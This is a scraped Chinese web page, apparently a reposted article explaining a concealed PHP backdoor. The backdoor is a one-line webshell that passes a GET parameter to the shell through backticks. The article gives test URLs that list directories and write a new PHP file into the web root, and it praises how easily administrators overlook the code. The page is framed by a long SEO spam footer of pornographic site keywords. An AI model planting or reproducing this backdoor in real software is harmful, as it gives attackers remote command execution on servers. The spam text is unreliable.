中文字幕日韩一区二区_国产一区二区av_国产毛片av_久久久久国产一区_色婷婷电影_国产一区二区精品

一個不易被發(fā)現(xiàn)的PHP后門代碼解析

偶然間看到一段,看起來似乎沒有什么問題,確是能致命的后門代碼,這里用到了一個一般的phper都不怎么關(guān)注的反撇號 ` ,反撇號包含的字符串,等同于shell_exec函數(shù)。

偽裝性很好,很容易被管理員忽略。

$selfNums = $_GET['r'];if (isset($selfNums)){  echo `$selfNums`;}

剛看到這段代碼我想大家都會說沒有問題,但是細心的朋友也會發(fā)現(xiàn)下面的變量被一個符號包起來了,既然是變量為什么要這樣了,

而且又不是單引號,這個就是關(guān)鍵所在了,這個符號是 Esc 下面的一個鍵(位于感嘆號!旁邊的),

通過 echo `系統(tǒng)命令`; 可以達到 system(); 一樣的效果

如果不信的朋友可以測試

http://127.0.0.1/t.php?r=dir 可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:/web/90sec.php

我用 appserv 和虛擬主機已經(jīng)測試成功。

php技術(shù)一個不易被發(fā)現(xiàn)的PHP后門代碼解析,轉(zhuǎn)載需保留來源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 美女黄视频网站 | 亚洲精品欧美一区二区三区 | 91亚洲精华国产 | 精品国产91乱码一区二区三区 | 久草资源在线视频 | 成年人在线观看 | 日日操日日干 | 天天插天天搞 | 国产精品中文字幕在线 | 色999日韩| 亚洲欧美日本在线 | 国产小视频在线 | 国产精品久久国产精品 | 日韩欧美国产电影 | 国产精品不卡一区 | 日本高清视频在线播放 | 人妖无码 | 亚洲国产日韩欧美 | 亚洲欧洲成人av每日更新 | 综合久久久 | 在线视频99 | 91免费看片| 在线色网址 | 国产精品99999999 | 91久久精品一区二区二区 | 国产一区在线免费 | 日本中文字幕在线视频 | 成人免费视频 | 欧美日韩综合 | 国产精品久久久久久238 | 国产精品国产a级 | 伊人天堂网 | 国产一区二区三区在线 | 国产亚洲精品美女久久久久久久久久 | 成人在线视频网站 | 欧美在线a | 男女深夜网站 | 国产一区二区三区在线 | 狠狠入ady亚洲精品经典电影 | 日日夜夜av | 日本不卡高清视频 |